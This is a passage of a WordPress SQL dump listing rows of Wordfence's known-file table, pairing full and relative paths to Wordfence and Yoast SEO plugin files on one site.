(712, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php', 'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php'),
(713, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-repair.php', 'wp-content/plugins/wordfence/views/scanner/issue-control-repair.php'),
(714, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php', 'wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php'),
(715, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php', 'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php'),
(716, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-database.php', 'wp-content/plugins/wordfence/views/scanner/issue-database.php'),
(717, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php', 'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php'),
(718, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php', 'wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php'),
(719, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-file.php', 'wp-content/plugins/wordfence/views/scanner/issue-file.php'),
(720, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php', 'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php'),
(721, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-knownfile.php', 'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php'),
(722, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php', 'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php'),
(723, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php', 'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php'),
(724, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php', 'wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php'),
(725, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php', 'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php'),
(726, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php', 'wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php'),
(727, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php', 'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php'),
(728, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php', 'wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php'),
(729, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-timelimit.php', 'wp-content/plugins/wordfence/views/scanner/issue-timelimit.php'),
(730, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php', 'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php'),
(731, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php', 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php'),
(732, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php', 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php'),
(733, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php', 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php'),
(734, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php', 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php'),
(735, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php', 'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php'),
(736, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php', 'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php'),
(737, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wfUpgradeError.php', 'wp-content/plugins/wordfence/views/scanner/issue-wfUpgradeError.php'),
(738, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php', 'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php'),
(739, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php', 'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php'),
(740, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/no-issues.php', 'wp-content/plugins/wordfence/views/scanner/no-issues.php'),
(741, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php', 'wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php'),
(742, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-advanced.php', 'wp-content/plugins/wordfence/views/scanner/options-group-advanced.php'),
(743, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-basic.php', 'wp-content/plugins/wordfence/views/scanner/options-group-basic.php'),
(744, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-general.php', 'wp-content/plugins/wordfence/views/scanner/options-group-general.php'),
(745, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-performance.php', 'wp-content/plugins/wordfence/views/scanner/options-group-performance.php'),
(746, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php', 'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php'),
(747, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-failed.php', 'wp-content/plugins/wordfence/views/scanner/scan-failed.php'),
(748, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php', 'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php'),
(749, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-progress-element.php', 'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php'),
(750, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-progress.php', 'wp-content/plugins/wordfence/views/scanner/scan-progress.php'),
(751, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-results.php', 'wp-content/plugins/wordfence/views/scanner/scan-results.php'),
(752, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-scheduling.php', 'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php'),
(753, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-starter.php', 'wp-content/plugins/wordfence/views/scanner/scan-starter.php'),
(754, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scan-type.php', 'wp-content/plugins/wordfence/views/scanner/scan-type.php'),
(755, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/scanner-status.php', 'wp-content/plugins/wordfence/views/scanner/scanner-status.php'),
(756, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php', 'wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php'),
(757, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php', 'wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php'),
(758, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php', 'wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php'),
(759, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/scanner/site-cleaning.php', 'wp-content/plugins/wordfence/views/scanner/site-cleaning.php'),
(760, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/tools/options-group-2fa.php', 'wp-content/plugins/wordfence/views/tools/options-group-2fa.php'),
(761, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php', 'wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php'),
(762, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/tours/login-security.php', 'wp-content/plugins/wordfence/views/tours/login-security.php'),
(763, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/unsupported-php/admin-message.php', 'wp-content/plugins/wordfence/views/unsupported-php/admin-message.php'),
(764, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/user/disabled-application-passwords.php', 'wp-content/plugins/wordfence/views/user/disabled-application-passwords.php'),
(765, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/debug.php', 'wp-content/plugins/wordfence/views/waf/debug.php'),
(766, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/firewall-status.php', 'wp-content/plugins/wordfence/views/waf/firewall-status.php'),
(767, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/option-rate-limit.php', 'wp-content/plugins/wordfence/views/waf/option-rate-limit.php'),
(768, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/option-rules.php', 'wp-content/plugins/wordfence/views/waf/option-rules.php'),
(769, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/option-whitelist.php', 'wp-content/plugins/wordfence/views/waf/option-whitelist.php'),
(770, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php', 'wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php'),
(771, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php', 'wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php'),
(772, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-brute-force.php', 'wp-content/plugins/wordfence/views/waf/options-group-brute-force.php'),
(773, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php', 'wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php'),
(774, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php', 'wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php'),
(775, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php', 'wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php'),
(776, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-install-manual.php', 'wp-content/plugins/wordfence/views/waf/waf-install-manual.php'),
(777, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-install-success.php', 'wp-content/plugins/wordfence/views/waf/waf-install-success.php'),
(778, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-install.php', 'wp-content/plugins/wordfence/views/waf/waf-install.php'),
(779, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php', 'wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php'),
(780, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php', 'wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php'),
(781, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/waf/waf-uninstall.php', 'wp-content/plugins/wordfence/views/waf/waf-uninstall.php'),
(782, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/.htaccess', 'wp-content/plugins/wordfence/waf/.htaccess'),
(783, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/bootstrap.php', 'wp-content/plugins/wordfence/waf/bootstrap.php'),
(784, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/dummy.php', 'wp-content/plugins/wordfence/waf/dummy.php'),
(785, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/entry.php', 'wp-content/plugins/wordfence/waf/pomo/entry.php'),
(786, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/mo.php', 'wp-content/plugins/wordfence/waf/pomo/mo.php'),
(787, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/plural-forms.php', 'wp-content/plugins/wordfence/waf/pomo/plural-forms.php'),
(788, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/po.php', 'wp-content/plugins/wordfence/waf/pomo/po.php'),
(789, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/streams.php', 'wp-content/plugins/wordfence/waf/pomo/streams.php'),
(790, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/pomo/translations.php', 'wp-content/plugins/wordfence/waf/pomo/translations.php'),
(791, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php', 'wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php'),
(792, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php', 'wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php'),
(793, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/wordfence.php', 'wp-content/plugins/wordfence/wordfence.php'),
(794, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/admin-settings-changed-listener.php', 'wp-content/plugins/wordpress-seo/admin/admin-settings-changed-listener.php'),
(795, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/ajax/class-shortcode-filter.php', 'wp-content/plugins/wordpress-seo/admin/ajax/class-shortcode-filter.php'),
(796, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php', 'wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php'),
(797, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php', 'wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php'),
(798, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/ajax.php', 'wp-content/plugins/wordpress-seo/admin/ajax.php'),
(799, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-abstract-capability-manager.php', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-abstract-capability-manager.php'),
(800, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php'),
(801, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-integration.php', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-integration.php'),
(802, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-vip.php', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-vip.php'),
(803, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php'),
(804, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager.php', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager.php'),
(805, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php'),
(806, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/capabilities/class-register-capabilities.php', 'wp-content/plugins/wordpress-seo/admin/capabilities/class-register-capabilities.php'),
(807, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-analysis-worker-location.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-analysis-worker-location.php'),
(808, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-dev-server-location.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-dev-server-location.php'),
(809, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-location.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-location.php'),
(810, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php'),
(811, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-asset-seo-location.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-asset-seo-location.php'),
(812, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-editor-specific-replace-vars.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-editor-specific-replace-vars.php'),
(813, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-gutenberg-compatibility-notification.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-gutenberg-compatibility-notification.php'),
(814, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php'),
(815, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-init.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-init.php'),
(816, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-recommended-replace-vars.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-recommended-replace-vars.php'),
(817, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php'),
(818, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin-utils.php', 'wp-content/plugins/wordpress-seo/admin/class-admin-utils.php'),
(819, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-admin.php', 'wp-content/plugins/wordpress-seo/admin/class-admin.php'),
(820, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-asset.php', 'wp-content/plugins/wordpress-seo/admin/class-asset.php'),
(821, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php', 'wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php'),
(822, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php', 'wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php'),
(823, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-bulk-title-editor-list-table.php', 'wp-content/plugins/wordpress-seo/admin/class-bulk-title-editor-list-table.php'),
(824, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-collector.php', 'wp-content/plugins/wordpress-seo/admin/class-collector.php'),
(825, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-config.php', 'wp-content/plugins/wordpress-seo/admin/class-config.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(826, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-customizer.php', 'wp-content/plugins/wordpress-seo/admin/class-customizer.php'),
(827, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-database-proxy.php', 'wp-content/plugins/wordpress-seo/admin/class-database-proxy.php'),
(828, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-export.php', 'wp-content/plugins/wordpress-seo/admin/class-export.php'),
(829, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php', 'wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php'),
(830, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php', 'wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php'),
(831, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-meta-columns.php', 'wp-content/plugins/wordpress-seo/admin/class-meta-columns.php'),
(832, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-my-yoast-proxy.php', 'wp-content/plugins/wordpress-seo/admin/class-my-yoast-proxy.php'),
(833, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-option-tab.php', 'wp-content/plugins/wordpress-seo/admin/class-option-tab.php'),
(834, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php', 'wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php'),
(835, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-option-tabs.php', 'wp-content/plugins/wordpress-seo/admin/class-option-tabs.php'),
(836, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-paper-presenter.php', 'wp-content/plugins/wordpress-seo/admin/class-paper-presenter.php'),
(837, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-plugin-availability.php', 'wp-content/plugins/wordpress-seo/admin/class-plugin-availability.php'),
(838, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php', 'wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php'),
(839, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-premium-popup.php', 'wp-content/plugins/wordpress-seo/admin/class-premium-popup.php'),
(840, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-premium-upsell-admin-block.php', 'wp-content/plugins/wordpress-seo/admin/class-premium-upsell-admin-block.php'),
(841, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-primary-term-admin.php', 'wp-content/plugins/wordpress-seo/admin/class-primary-term-admin.php'),
(842, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-product-upsell-notice.php', 'wp-content/plugins/wordpress-seo/admin/class-product-upsell-notice.php'),
(843, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-remote-request.php', 'wp-content/plugins/wordpress-seo/admin/class-remote-request.php'),
(844, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-schema-person-upgrade-notification.php', 'wp-content/plugins/wordpress-seo/admin/class-schema-person-upgrade-notification.php'),
(845, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-suggested-plugins.php', 'wp-content/plugins/wordpress-seo/admin/class-suggested-plugins.php'),
(846, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-wincher-dashboard-widget.php', 'wp-content/plugins/wordpress-seo/admin/class-wincher-dashboard-widget.php'),
(847, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-columns.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-columns.php'),
(848, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-dashboard-widget.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-dashboard-widget.php'),
(849, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-form.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-form.php'),
(850, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-input-validation.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-input-validation.php'),
(851, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-network-admin.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-network-admin.php'),
(852, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-network-settings-api.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-network-settings-api.php'),
(853, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-notification-center.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-notification-center.php'),
(854, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-notification.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-notification.php'),
(855, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-notifications.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-notifications.php'),
(856, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/class-yoast-plugin-conflict.php', 'wp-content/plugins/wordpress-seo/admin/class-yoast-plugin-conflict.php'),
(857, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-file-size.php', 'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-file-size.php'),
(858, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-statistics.php', 'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-statistics.php'),
(859, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint.php', 'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint.php'),
(860, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/exceptions/class-file-size-exception.php', 'wp-content/plugins/wordpress-seo/admin/exceptions/class-file-size-exception.php'),
(861, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/filters/class-abstract-post-filter.php', 'wp-content/plugins/wordpress-seo/admin/filters/class-abstract-post-filter.php'),
(862, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/filters/class-cornerstone-filter.php', 'wp-content/plugins/wordpress-seo/admin/filters/class-cornerstone-filter.php'),
(863, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/formatter/class-metabox-formatter.php', 'wp-content/plugins/wordpress-seo/admin/formatter/class-metabox-formatter.php'),
(864, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/formatter/class-post-metabox-formatter.php', 'wp-content/plugins/wordpress-seo/admin/formatter/class-post-metabox-formatter.php'),
(865, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/formatter/class-term-metabox-formatter.php', 'wp-content/plugins/wordpress-seo/admin/formatter/class-term-metabox-formatter.php'),
(866, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/formatter/interface-metabox-formatter.php', 'wp-content/plugins/wordpress-seo/admin/formatter/interface-metabox-formatter.php'),
(867, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc.php', 'wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc.php'),
(868, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-display.php', 'wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-display.php'),
(869, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-redirect-nopremium.php', 'wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-redirect-nopremium.php'),
(870, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/class-import-detector.php', 'wp-content/plugins/wordpress-seo/admin/import/class-import-detector.php'),
(871, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/class-import-plugin.php', 'wp-content/plugins/wordpress-seo/admin/import/class-import-plugin.php'),
(872, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/class-import-settings.php', 'wp-content/plugins/wordpress-seo/admin/import/class-import-settings.php'),
(873, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/class-import-status.php', 'wp-content/plugins/wordpress-seo/admin/import/class-import-status.php'),
(874, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-abstract-plugin-importer.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-abstract-plugin-importer.php'),
(875, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo-v4.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo-v4.php'),
